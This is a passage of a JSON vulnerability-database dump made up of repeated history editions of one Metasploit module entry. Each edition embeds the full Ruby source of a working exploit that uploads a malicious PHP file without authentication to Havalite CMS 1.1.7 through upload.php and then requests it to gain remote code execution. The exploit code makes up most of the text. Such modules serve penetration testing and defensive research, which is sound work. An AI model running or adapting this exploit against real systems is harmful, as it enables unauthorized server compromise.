and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-24T15:57:56", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-26T03:51:29", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-26T03:51:29", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-26T03:51:29", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-26T07:49:23", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-26T07:49:23", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-26T07:49:23", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-26T11:53:13", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-26T11:53:13", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-26T11:53:13", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-27T03:50:38", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-27T03:50:38", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-27T03:50:38", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-21T16:35:37", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-27T03:50:38", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-04-21T16:35:37", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-21T22:33:38", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-04-21T22:33:38", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
